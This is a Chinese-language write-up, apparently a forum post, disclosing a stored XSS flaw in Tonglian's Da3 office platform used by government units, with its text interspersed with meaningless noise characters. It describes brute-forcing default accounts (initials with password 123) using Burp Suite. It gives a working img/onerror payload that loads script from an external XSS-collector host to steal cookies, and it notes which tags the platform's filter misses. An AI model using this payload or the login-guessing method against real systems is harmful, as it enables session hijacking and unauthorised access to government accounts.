& f( H1 d }+ l- _
" r2 u' ~% f" n& O& N
同联Da3协同办公平台后台通用储存型xss漏洞
6 ?0 }9 l) B9 C
$ E X. w7 v2 L+ P) t) L
+ [/ g, z, v8 e/ o( [0 l' s" H2 w 平台简介:/ x ?% |2 I+ I
) C X# B4 Z! Y* V
$ q& s- Z" ^- R @8 A6 ~4 A7 E 2 t5 S2 \1 d3 A% q
6 P# Y# t0 q, O# b
6 [0 y* ?$ R7 F+ Z# l 北京同联信息技术有限公司(以下简称同联)由用友政务与用友原行业事业部团队合伙出资成立。同联以“为全国各级政府单位提供信息化咨询规划、建设解决方案和信息化运维服务,以加强各级政府的精细化、智能化管理,形成高效、敏捷、便民的新型政府。”为使命,致力于为各级政府单位提供专业、标准、灵活、易用的信息化产品及专业的服务。
! M; i$ p+ O: o7 [+ j. R! l同联面向政府单位提供专业、标准、灵活、易用的信息化产品。针对各级政府单位,分别提供以“移动政务办公”为主的Da3系列管理软件;针对政法单位提供以“协同办案”为核心的政法协同办案系统等。
" C9 A2 n& T2 @
同联本着“协作、专业、创新”的工作方针,为推动各级政府单位信息化、促进各级政府快速转型为 “智慧型政府”做出积极贡献!! {3 V! N' H( d+ E, c4 \& B
, b' t9 v2 J; T2 v2 E) m
/ i# | a8 I. H1 r 9 |1 j8 s9 ^" L" ?4 e
. p" x' Q8 d6 h) v, S2 n! C - K9 b. S/ x: C2 e
由于此程序为新开发的程序,故能找到的案例并不多,下面附案例地址:4 J8 E7 f* u4 L( `+ U
, f7 j" }+ C4 B$ S. `# k2 O
, Z& Y! ]5 S0 Z: Y- Y; R6 i9 x4 ~
4 r6 C- W+ o( E' k
6 e9 m0 M8 s- P& r 0 K9 k! O& [$ k/ p c
http://1.1.1.1:7197/cap-aco/#(案例2-)
+ s& R& e; N2 I1 v
2 ^1 i: _" N8 J* `4 X x" b5 r% a9 s ' R. ~1 p( s; b( h% ~
http://www.XXOO.com (案例1-官网网站)
B3 I; F9 H3 \
. _4 Y; V% m" A- w# ~ F
0 S) Q+ v% b$ O 漏洞详情:& N8 O, o+ J2 N$ F
! }$ Y3 q' t9 Z+ T& P/ b$ u. D
2 J/ s7 a4 }1 c% }6 A5 l7 ^ 案例一、
& [7 V3 d# r$ D* R& {" P3 a
2 M: O C D& H- M! W' x
. `2 X v8 t2 z0 K0 _8 U" O 初步确定平台的默认账号为姓名的首字母小写,初始密码为123,为了能够更好的模拟入侵,使用黑盒测试手段进行测试% A1 U( K$ J* F3 \7 A* y
1 c8 I v' _/ W, Y
- R7 y5 L& n7 o0 |# }. e, s2 o 首先使用burpsuite代理,然后再用黑客字典生成一个全英文小写的3位字典,利用burpsuite进行暴力破解,破解结果如图:. p: T& s7 _+ [( L
$ N$ F2 l; F: S/ w! `- z" W
/ p" e. P' S" p0 {9 q" H% g. [) x
7 N) E- ]! T( {4 O$ z
2 K& s% R, ?/ W( \9 H
$ h- f1 q/ N+ t3 s4 r: ]+ @, G
( A! v* ^- G, b! q+ j) ]
* {% [4 {/ @( J+ W9 Y
4 R$ @6 o9 ?( b- Z9 T. U status为302即表示破解成功,然后找个破解成功的账号登录系统。然后在通知公告---通知公告发布-拟稿处存在储存型xss漏洞,我在编机器里填写好标题、选择人员,点html如图: 3 ^) ]( h, H! o
' ~4 e6 J/ i; v+ i* k6 [
5 {- W i- M1 B/ g- a) J t
1 P4 M8 P7 H5 q; R1 F
1 s, I/ ~" h/ \6 ^# F: x
5 C. {+ B. T" g c* C; @8 I
2 z$ n5 t& Y: A
3 b! ?* ]# g% l, z1 O
6 E. F" B! s4 C8 c* H1 F5 ` 然后插我们的xss跨站代码(经过测试发现过滤了好多标签,比如script,没过滤img、iframe标签),这里我们用img标签来测试,payload如下 2 A3 X/ g: V; J6 F" G/ n5 H& K
* F" l, j0 p. X. f L ; K. C8 K. v k/ i
% {" e) K, B9 C% r7 x: r: P
8 l+ \; J. k" \0 l $ y9 z: r7 q9 f7 e# V7 I
<img src=x2 {* M' N' ]. B5 H4 }, {# D
onerror=s=createElement('\x73cript');body.appendChild(s);s.src='http://xss.6kb.org/7OO7GQ?1510065652';>,如图:
# T3 N3 U/ W0 Q! L
9 y U U9 w* {, b+ u* p
$ q. y* t! a U( @1 L5 l9 a( V
& c+ B: d1 O! \' V+ Q( ~# K3 a' x7 A# X! a
: p, m* _" N: j8 @4 a4 h! \ 8 M$ U0 ]) K% l0 U
然后发送,接收cookie如图: 7 {9 {8 ~4 Z- h; D
) H5 y2 n, e, B5 d" b
t; ~1 C9 A7 A* X) V
1 L3 r; L$ s7 I# E
6 |6 c$ X% e1 Q8 Y ! ~* x u% ^: D- k
4 r6 }8 |5 c6 } O/ O' V
+ y* U. ?; s0 R
4 K7 f! p2 r2 R 4 {7 r e4 m7 j2 v, r C7 m
3 N1 e0 ]+ C% K& \
9 C W, H; U1 I E7 g" q+ I3 X
& [- j2 b$ M/ c |
& X! d# U/ H+ n, v+ E+ y
/ _. H8 i5 [& v0 z6 {7 ^0 K- e
9 U) J" H/ Q6 @7 ?9 J, L7 k3 W
& A$ R4 j% t- h
3 d. Z" H6 V F+ O6 A7 o
$ J! y4 l. n8 Y
6 H7 ~0 N2 z7 A. P4 ~
% m* s4 B( t$ W; f0 i! M
0 u3 h3 G6 i9 K) F) I
J7 Q1 M" b! I! l2 n 1 |2 L$ S4 O* m$ \0 L/ e- U$ R. U
案例2、
% k+ v: i( C9 X1 J0 ~( p
6 U9 V/ Z( X2 c& ~
1 r0 c0 O# L3 n& I! M' @
前面步骤都一样,下面看效果图: & y8 l" N$ D& U+ F* P
# N/ |* N3 P2 A( U
% _$ Q" H& O m- f' O# s
4 k$ N+ {8 H; P7 A- w& h! D' v
. v/ A$ {) k$ `5 w& f" s* r 0 Y/ q# K0 [$ W
) K W( p) d4 Q" T! ~
8 ~5 E7 X; Z9 h6 U/ z) K5 w2 o , H6 `& o: ~- q9 ~$ I' ~0 s
/ b; E5 `( N N% h( }
! O3 y7 ?3 `( P" T
: C4 I* M; \0 B; s3 X' \( L
6 }9 A% o7 j4 g% a
" s1 i" a% `% b1 _" ] * c6 q4 T) B8 |6 t9 j
4 \/ D0 S2 [2 M# H4 |' y
( O* h% m* Y7 Z! m+ C* A/ f1 y
e- G6 u) Q: B3 b, N+ p8 i P
3 R1 i! E8 Y0 o }$ B9 m$ c0 Y/ ^
# G$ r% Z5 S$ F9 b n
( r! n' _3 U( m8 ~! v; U: d * f8 x; }& @7 c d+ m
6 s1 X5 S7 C. d; h
( B, v- f1 b; M- k; r- o( O
+ p# o$ G" f1 n, U! @% f+ E, y
, k. V" F/ P" B2 v$ P
, s R. P; H& l# R, w4 H
) C2 ?, X, d8 S- Q2 @% v C
3 X8 s E0 \5 J; a" H/ ]4 ~3 U